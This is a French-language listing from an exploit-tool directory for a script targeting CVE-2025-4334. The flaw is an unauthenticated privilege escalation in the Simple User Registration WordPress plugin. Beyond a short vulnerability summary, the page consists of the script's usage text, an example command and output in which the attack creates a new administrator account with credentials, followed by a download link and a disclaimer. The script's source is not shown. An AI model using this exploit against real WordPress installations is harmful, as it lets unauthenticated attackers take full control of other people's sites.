Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-4334 — Simple User Registration <= 6.3 - Élévation de privilèges non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-4334
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-4334

CVE-2025-4334

Simple User Registration <= 6.3 - Élévation de privilèges non authentifiée

Voir le dépôt
733il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔓 Simple User Registration <= 6.3 - Élévation de privilèges non authentifiée

📄 Description

Le plugin Simple User Registration pour WordPress est vulnérable à l'élévation de privilèges dans toutes les versions jusqu'à la 6.3 incluse.
Cela est dû à des restrictions insuffisantes sur les valeurs de métadonnées utilisateur qui peuvent être fournies lors de l'inscription.
Cela permet à des attaquants non authentifiés de s'inscrire en tant qu'administrateur.


🛡️ Détails de la vulnérabilité

  • Type : Gestion des privilèges inappropriée
  • CVE : CVE-2025-4334
  • Score CVSS : 9,8 (Critique)
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Publié publiquement : 25 juin 2025
  • Dernière mise à jour : 26 juin 2025

🛠️ Script d'exploitation

L'exploit automatise l'élévation de privilèges via la soumission d'un formulaire en utilisant le nonce, l'ID de formulaire et le référent extraits.

⚙️ Utilisation

root@kitploit:~
python CVE-2025-4334.py -h
root@kitploit:~
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form

🌐 Explication des URL

  • -u → Installation WordPress de base (par ex. http://localhost/wordpress/)
  • --form → URL complète du formulaire d'inscription vulnérable (par ex. http://localhost/wpr/default-registration/)

🧪 Exemple

root@kitploit:~
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ Résultat

root@kitploit:~
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : [email protected]
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ Avertissement

Ce script est fourni uniquement à des fins éducatives et de recherche.
L'auteur n'est pas responsable de tout usage abusif ou dommage causé par cet outil.


Par : Khaled_alenazi (Nxploited)

Télécharger l’outil